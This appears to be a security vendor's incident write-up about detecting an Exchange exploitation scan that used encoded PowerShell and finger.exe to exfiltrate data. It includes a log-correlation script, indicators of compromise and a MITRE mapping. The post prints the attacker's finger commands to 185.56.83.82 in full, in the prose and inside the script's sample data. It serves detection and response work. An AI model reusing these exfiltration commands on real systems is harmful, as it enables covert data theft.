Threat Intel Accelerates Detection & Response


Identifying the Exploit

In November 2023, the ĢTV team identified novel indicators of an attack where the threat actor used finger.exe (top portion illustrated in Figure 1) to exfiltrate reconnaissance information from an endpoint. Due to the novelty of the observed activity, ĢTV analysts conducted a thorough analysis of the available data, documented and shared the findings internally, and then published a blog post to share those findings with the community.

Figure 1: ĢTV Blog

In January 2024, a customer added the ĢTV agent to an endpoint, and as soon as the agent began reporting in, ĢTV SOC analyst Josh Allman noticed a legacy Windows Defender detection, what ĢTV refers to as a “Managed Antivirus” (MAV) alert (illustrated in Figure 2), for a finger.exe command line sending a string of digits to the IP address 185.56.83[.]82, the same IP address associated with the November activity. The SOC identified the similarities in the indicators of attack and shared the MAV alert with the threat intel team.

Figure 2: MAV Alert via ĢTV Portal

At this point, the ĢTV agent had only been on the endpoint for a matter of minutes, and the MAV alert preceded the agent installation by almost two weeks. By the time the threat intel team accessed the endpoint information page in the ĢTV portal, the agent had been installed on the endpoint for only 27 minutes.

Digging a bit deeper into data retrieved from the endpoint, ĢTV threat intel analysts located the Windows Defender detection events within a timeline created from Windows Event Log data. These detection events identified a total of four command lines: three were base64-encoded PowerShell commands and the fourth was not encoded. Windows Defender remediated all four commands.

The first detected command, when decoded, was:

finger user@185.56.83[.]82

This was followed by an encoded PowerShell command that, once decoded, was itself a further-obfuscated PowerShell command, and then by an encoded whoami command, which is illustrated in Figure 3.

Figure 3: Decoding PowerShell via CyberChef

The final command was not encoded PowerShell:

C:\Windows\System32\cmd.exe /c finger 42341@185.56.83[.]82

The time between Windows Defender identifying the command (Windows Defender/1116 event record) and taking action on it (Windows Defender/1117 event record) was 17 seconds, more than enough time for the command to complete successfully. There was similar timing between the other commands detected by Windows Defender, and without access to the threat actor’s system, ĢTV analysts proceeded with analysis and response assuming that the commands had completed successfully.

The three base64-encoded PowerShell commands identified by Windows Defender also corresponded with event records from the C:\Windows\System32\winevt\Logs\MSExchange Management.evtx Event Log file, with source “MSExchange CmdletLogs” and event ID 6. These event records contain, among other strings, XML-formatted data that includes the string ProcessStartInfo Arguments, followed by the encoded PowerShell.

Digging deeper, ĢTV analysts located relevant data associated with the 185.56.83[.]82 IP address in the C:\inetpub\Logs\LogFiles\W3SCV1\u_ex240112.log file; specifically, POST requests with a status code of 200 to the /owa/mastermailbox@outlook.com/powershell page (User-Agent: Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36). These requests occurred at the same time as the Windows Event Log records from both Windows Defender and MSExchange, creating an artifact constellation that augmented the timeline and validated the findings. An excerpt of the web server log entry is illustrated in Figure 4.

Figure 4: Web Server Log Entry Excerpt

Viewed together, this artifact constellation corresponds to the shared by Palo Alto Networks’ Unit42 in December 2022. In their article, Unit42 attributed the discovery of the threat actor’s exploit code to ĢTV’s very own .

The total time between the identified commands was under a minute, as illustrated in both the Windows Event Log data and the web server logs. As no follow-on activity was identified, it would appear that the commands detected were associated with a scan. ĢTV analysts verified that the customer’s version of MSExchange had last been updated in September 2021, and following the confirmation of these findings, the customer was notified of the immediate need to update their MSExchange installation.
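The correlation described above, carried out in code: measuring the 1116-to-1117 dwell time, decoding the -EncodedCommand payloads, and pairing each Defender detection with the successful OWA PowerShell POSTs from the IoC address in the IIS W3C log. This is an added example, not ĢTV's tooling; every log record and timestamp in it is constructed, only the IP address, URI path and event IDs come from the post.

```python
import base64
import re
from datetime import datetime

IOC_IP = "185.56.83.82"  # the address named in the post; every record below is constructed

# Constructed Defender records: (timestamp, event id, command line); 1116 = detected, 1117 = action taken
DEFENDER = [
    ("2024-01-12 09:15:02", 1116, r"C:\Windows\System32\cmd.exe /c finger 42341@185.56.83.82"),
    ("2024-01-12 09:15:19", 1117, r"C:\Windows\System32\cmd.exe /c finger 42341@185.56.83.82"),
    ("2024-01-12 09:15:25", 1116, "powershell.exe -EncodedCommand dwBoAG8AYQBtAGkA"),
    ("2024-01-12 09:15:41", 1117, "powershell.exe -EncodedCommand dwBoAG8AYQBtAGkA"),
]
# Constructed IIS W3C excerpt; the POSTs target the OWA PowerShell path quoted in the post
IIS_LOG = """#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status
2024-01-12 09:14:50 GET /owa/auth/logon.aspx 198.51.100.7 Mozilla/5.0+Firefox 200
2024-01-12 09:15:01 POST /owa/mastermailbox@outlook.com/powershell 185.56.83.82 Mozilla/5.0+Chrome/105.0.5195.54 200
2024-01-12 09:15:24 POST /owa/mastermailbox@outlook.com/powershell 185.56.83.82 Mozilla/5.0+Chrome/105.0.5195.54 200"""


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None if not encoded."""
    m = re.search(r"-e(?:ncodedcommand|nc)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def dwell_times(events):
    """Seconds between each 1116 (detected) record and the 1117 (remediated) record for the same command line."""
    detected = {cmd: datetime.fromisoformat(ts) for ts, eid, cmd in events if eid == 1116}
    return [(cmd, int((datetime.fromisoformat(ts) - detected[cmd]).total_seconds()))
            for ts, eid, cmd in events if eid == 1117 and cmd in detected]


def parse_iis(text):
    """Parse W3C extended log lines, taking column names from the #Fields directive."""
    lines = text.splitlines()
    fields = next(ln for ln in lines if ln.startswith("#Fields:")).split()[1:]
    return [dict(zip(fields, ln.split())) for ln in lines if ln and not ln.startswith("#")]


def correlate(events, rows, window=15):
    """Pair each 1116 detection with a 200 POST to an OWA /powershell path from the IoC IP within `window` seconds before it."""
    posts = [(datetime.fromisoformat(f"{r['date']} {r['time']}"), r) for r in rows
             if r["cs-method"] == "POST" and r["cs-uri-stem"].endswith("/powershell")
             and r["c-ip"] == IOC_IP and r["sc-status"] == "200"]
    return [(r["time"], ts, decode_encoded_command(cmd) or cmd)
            for ts, eid, cmd in events if eid == 1116
            for rt, r in posts if 0 <= (datetime.fromisoformat(ts) - rt).total_seconds() <= window]
```

The 15-second window is a tuning choice for the constructed data; in the incident the whole sequence fit inside a minute, so the window should be set from the observed spacing of the 1116 records rather than fixed.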

Conclusion

This incident illustrates how the previous identification and sharing of indicators of compromise led to swift identification and response to a legacy exploit that existed on an endpoint prior to the ĢTV agent being installed. This demonstrates how ĢTV doesn’t wait to protect the 99%, and will use whatever information is available to clearly and accurately identify an incident, and provide remediation steps.

Indicators of Compromise

185.56.83[.]82 - Source IP address for POST requests to the web server, as well as destination IP address for finger.exe commands.

MSExchange CmdletLogs/6 event records in the C:\Windows\System32\winevt\Logs\MSExchange Management.evtx Event Log file that contain the strings “System.Diagnostics”, “w3wp#MSExchangePowerShellAppPool”, and “ProcessStartInfo Arguments”, followed by the base64-encoded PowerShell commands.

Web server logs (from the C:\inetpub\Logs\LogFiles\W3SCV1 folder, in this instance) containing POST requests to /owa/mastermailbox@outlook.com/powershell, the 185.56.83[.]82 IP address (source of request), and the User-Agent string Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36.

MITRE ATT&CK Mapping

Initial Access - T1190 - Exploit Public-Facing Application

Execution - T1059.001 (PowerShell), T1059.003 (Windows Command Shell)

Persistence - T1078 (Valid Accounts; per , the threat actor had to first authenticate to the server prior to exploitation)
